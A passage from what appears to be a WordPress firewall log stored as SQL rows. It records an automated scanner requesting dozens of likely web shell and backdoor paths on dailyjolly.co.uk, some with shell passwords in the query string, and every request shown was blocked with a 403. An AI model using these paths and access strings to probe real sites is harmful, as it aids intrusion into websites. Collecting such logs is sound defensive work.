'{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-includes\\/admin-bar.php\"}','u8Q3LYcbXo7nJylDrN0gPSCa',0,1674344694.5848,164,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-site.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-site.php\"}','7DhJ2Z3LuXP4sAt1CvzTenOx',0,1674344694.9034,191,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/xmrlpc.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/xmrlpc.php\"}','IaCTq9syM30K18rRbnGQeYEl',0,1674344695.2500,190,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/xx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/xx.php\"}','i5HSudm1JXYNoyjMPeqa9Zbk',0,1674344695.6039,231,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/1index.php?pass=am*guAW8.ryDgz-TYF','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/1index.php?pass=am*guAW8.ryDgz-TYF\"}','0QziGtEJfWreNwICapSTX9UL',0,1674344695.9984,208,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/assets/pi.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/assets\\/pi.php\"}','MWYolmGu9e58DjysCdgHLNJQ',0,1674344696.5001,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/block-supports/generated-classname-cron.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/block-supports\\/generated-classname-cron.php\"}','3Tf7v8sqorB0F2iUaCE1PVct',0,1674344696.8140,199,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/css/ty.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/css\\/ty.php\"}','ivl6ayQXcFmwCqtW8kgIeNb7',0,1674344697.1579,180,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/customize/class-wp-customize-nav-menu.php?new','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/customize\\/class-wp-customize-nav-menu.php?new\"}','9DGJ4OzhankecXrHw8ZCEjuK',0,1674344697.4903,191,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/js/a.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/js\\/a.php\"}','1o4yHpWnBaERgfelhKMqAtcx',0,1674344697.8362,181,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/alfa.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/alfa.php\"}','vsGaSe3dNjPrMEQbqWp4DCU9',0,1674344698.3312,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/css_.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/css_.php\"}','7cHpzQmWydq13Cnrxo4iI5Ll',0,1674344698.6553,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-info.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-info.php\"}','iQhoNOSt9V78zbnKD5xcGYXw',0,1674344698.9751,162,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-x.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-x.php\"}','dZejfc32L7h8ba1omUD5qkT0',0,1674344699.2856,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp.php\"}','9nHor3VM7Af45RSjizOLeJhu',0,1674344699.6176,161,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp_logx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp_logx.php\"}','ZAxtw7BNoTf4MaGEHvhViLOu',0,1674344699.9323,173,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp_wrong_datlib.php?pass=stusa','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp_wrong_datlib.php?pass=stusa\"}','O4MAsSifBD1TCqLZhaFemwgd',0,1674344700.2708,176,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wpx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wpx.php\"}','bpAaoBQ3jTS2nv1iDWYKJNdF',0,1674344700.6013,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wso.php\"}','WUI8dyQ65Hz4GVmacYf9xqig',0,1674344700.9214,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wxo.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wxo.php\"}','MxgPCoOGJza6rj2Lb5YTdQ7c',0,1674344701.2330,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/x.php\"}','yPJfveQsrGm8olcbqY9tuV0R',0,1674344701.5510,204,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/xl.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/xl.php\"}','W7t28AioDzdOgQxYb96jhyXc',0,1674344701.9272,186,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/xleet.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/xleet.php\"}','2QIZeC7UPAOuTsJg18NFBK3m',0,1674344702.2764,160,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/xlt.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/xlt.php\"}','POl6m1LnQWy89G4wzYXhtuNp',0,1674344702.5895,163,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/xml.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/xml.php\"}','hcTlS0DProMwgCQupZeis4RE',0,1674344702.9063,179,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/xmlrqc.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/xmlrqc.php\"}','HikhXMJ20OqvEslDNCrV3oB6',0,1674344703.2381,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/xwxx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/xwxx.php\"}','WF83LxaZ96BYpSe5QoDqUMCT',0,1674344703.5612,161,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/XxX.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/XxX.php\"}','DiFvTEyIBo4hZkXUVKGdc1p2',0,1674344703.8753,157,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/xx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/xx.php\"}','cLptnKeARkCXVPdhyl98gF3q',0,1674344704.1856,161,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-2018.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-2018.php\"}','qSYWOuUc71y4flo8Chk5gr2x',0,1674344704.4995,183,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-2019.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-2019.php\"}','DtfyzCn7awi9A2JLu3EpPqhx',0,1674344704.8265,157,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-2020.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-2020.php\"}','Cem7URd9XzwatFPilSvBMEH3',0,1674344705.1379,195,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-2021.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-2021.php\"}','xPrpiB5Jc3fGaA4uI8qhosde',0,1674344705.4881,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-2022.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-2022.php\"}','ZkM63It71SYcOrlR5ACbos9B',0,1674344705.8212,196,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-22.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-22.php\"}','3NuMYsiFcJQnZHr5Rvkj0t4C',0,1674344706.1707,176,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/hax.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/hax.php\"}','aNCkZFUi1JOjfgbPvAHluwrx',0,1674344706.5063,201,'','GET',403,0,700,0,1,'',0),('185.192.70.64',3116385856,'','https://dailyjolly.co.uk/wp-admin/imagescheckflush.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','8Xo3yKG4egzkULHaYVTfJxS7',0,1674348307.9549,2539,'','POST',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/chris.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/\\/chris.php\"}','jAcO5dW7gI1sv6DkZywPGtLi',0,1674369862.2012,344,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/da1e2eeec7.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/\\/da1e2eeec7.php\"}','v0eMcCBGdbTOZtW9xiwXV1rn',0,1674369862.7383,202,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/freshtools.net.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/\\/freshtools.net.php\"}','I3MscwtnrF7JxkSdK2GZmaLB',0,1674369863.1311,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/gindex.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/\\/gindex.php\"}','e3Dvh1NfzR5bXOGwLEquMUPg',0,1674369863.4581,179,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/img.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/\\/img.php\"}','mQgquO2E90JFz6y3bZSBwNfC',0,1674369863.7892,175,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/seo.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/\\/seo.php\"}','AXsq9YduL7nhzUIl0pDJVCBj',0,1674369864.1177,185,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/subirfoto.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/\\/subirfoto.php\"}','LPEawHk65CtyvSe4uGUj0loD',0,1674369864.4524,209,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/acme-challenge/licsy.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/acme-challenge\\/licsy.php\"}','EASgtiPYojTmB6u4rWfaNx5J',0,1674369864.8113,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/acme-challenge/makeasmtp.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/acme-challenge\\/makeasmtp.php\"}','nWqho4KFNiS1RfkTCsru7A6y',0,1674369865.1264,175,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/acme-challenge/wp-signup.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/acme-challenge\\/wp-signup.php\"}','fP37D9eYH86SZ1UEpRsyBIKk',0,1674369865.4525,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/%20.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/pki-validation\\/%20.php\"}','SJlNmubvIP0t5YXeC91M8okF',0,1674369865.7731,173,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/bala.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/pki-validation\\/bala.php\"}','OfpRwIyKCgFuV3TJDQv8rXSk',0,1674369866.1107,175,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/p.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/pki-validation\\/p.php\"}','v3pbm92cKSyXEOFroiaeUMYu',0,1674369866.4333,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/psp.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/pki-validation\\/psp.php\"}','AsfnvwqZ3Qp0OEPHjNGrlMSa',0,1674369866.7489,185,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/sdf-dffg.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/pki-validation\\/sdf-dffg.php\"}','uEyfYX2cUpLiMN7d1nPKO0rB',0,1674369867.0813,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/wp-signup.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/pki-validation\\/wp-signup.php\"}','l4kyU1KjRIYfFiwrax7QHANn',0,1674369867.3969,233,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/.well-known/pki-validation/z88x/0z.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/.well-known\\/pki-validation\\/z88x\\/0z.php\"}','sZ5XpnWy9ueIbUMErSta86LQ',0,1674369867.7956,179,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin/add_modal.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/admin\\/\\/add_modal.php\"}','sjQCMYb8re1ci7fJFAkLEqaP',0,1674369868.1229,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin/adminedit.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/admin\\/\\/adminedit.php\"}','hG1jNR4QcKnZqDYJUBrsewCT',0,1674369868.4568,209,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin/editProject.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/admin\\/\\/editProject.php\"}','viFrwkEOqth2PY0MaIUxHc8g',0,1674369868.8426,192,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin/index_upload.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/admin\\/\\/index_upload.php\"}','r90fvpBOVxo4eYuDFcHRSzWC',0,1674369869.2001,172,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin/reg_referencia.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/admin\\/\\/reg_referencia.php\"}','Xm0pw4U23OdaGtlQzJgSLxFM',0,1674369869.5197,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin/bak/UploadPic.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/admin\\/bak\\/UploadPic.php\"}','rt4dJch7geFZwp02mlVb6q9X',0,1674369869.8355,238,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/admin/editor/assetmanager/assetmanager.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/admin\\/editor\\/assetmanager\\/assetmanager.php\"}','qkSjJrxXmVUPfLItByaewDOF',0,1674369870.2416,188,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/assets/css/ENKI.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/assets\\/css\\/ENKI.php\"}','iYf7qX0pErsx5c1bUVCZFkJ2',0,1674369870.5885,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/assets/filemanager/dialog.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/assets\\/filemanager\\/dialog.php\"}','GpqEuItPeokYOSUDJC9Zxn2w',0,1674369870.9105,213,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/assets/images/images.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/assets\\/images\\/images.php\"}','KnJ50w86mOhMj1VQDorZubd9',0,1674369871.2926,226,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/files/auto1.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/files\\/\\/auto1.php\"}','XfV89eZ2xjk0GBQJLrtSUzcl',0,1674369871.7538,177,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/files/ban.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/files\\/\\/ban.php\"}','JAqyYKVMN9DBOfcQXpvsPHx4',0,1674369872.0871,196,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/files/cons.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/files\\/\\/cons.php\"}','5QMJiT1Kqzs4lELnOuHPxfkY',0,1674369872.4731,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/files/galeria.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/files\\/\\/galeria.php\"}','TMFPe4ukhpow8Ev1YXfHWKxJ',0,1674369872.7792,161,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/files/upload.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/files\\/\\/upload.php\"}','GwYrXV1ReyMlaSOnjQE7oJvt',0,1674369873.0870,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/1U.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/1U.php\"}','pRPoNlXZmdsVLjk4W6Ky3zH2',0,1674369873.4071,206,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/css.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/css.php\"}','kDVYULuo6cHp4XnCqgfsSayw',0,1674369873.7628,176,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/domat.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/domat.php\"}','z7Niw0CJ96qKSOcQgaFWLoDX',0,1674369874.1062,161,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/eee.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/eee.php\"}','vdq40zGcFSDJog1NxwhaKHbn',0,1674369874.4188,217,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/ET0O.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/ET0O.php\"}','7ovKJ3au0wfnEY2V94q18gs6',0,1674369874.7845,224,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/formulier.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/formulier.php\"}','zMbPktLRWyceUFBHGf8ZQ26N',0,1674369875.1794,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/h[1].php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/h%5b1%5d.php\"}','W5gJL4Z32oiBtQ7VRzw10m8e',0,1674369875.4960,172,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/idpago.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/idpago.php\"}','NyVljfam63icXoA7Y9Us40Ot',0,1674369875.8158,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/images.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/images.php\"}','Z6FLxmuKnBU8gAq5NoXRHeWQ',0,1674369876.1347,182,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/imagrer.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/imagrer.php\"}','PBzDnOcXWLYCaukwK1i52fJb',0,1674369876.5193,204,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/inbox.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/inbox.php\"}','bm4zGtM9sRPquheBEIZoWOJH',0,1674369876.8725,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/include.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/include.php\"}','CRZ7nOfpPYGDNdArqh6FEe98',0,1674369877.1870,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/index.blade.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/index.blade.php\"}','IU7EzhSbDpsgCt0f5XyVTq1F',0,1674369877.5114,173,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/index2.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/index2.php\"}','hUNHsDat39SCWOg8l4vAmcyG',0,1674369877.8365,173,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/iupload.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/iupload.php\"}','7Rl6LjvwkbdUWMhmBIQAe5Ht',0,1674369878.1608,160,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/Logo_mm.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/Logo_mm.php\"}','ldMWVw1fcU42izTmuDpyQgq9',0,1674369878.4677,194,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/m.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/m.php\"}','simE9BCMxbketYRcvJnA6lXW',0,1674369878.8138,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/Marvins.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/images\\/\\/Marvins.php\"}','ahEZDLw9bVevGU4N81lzIMOJ',0,1674369879.1205,160,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/images/membernew.php','','{\"1\":\"Go-http-client\\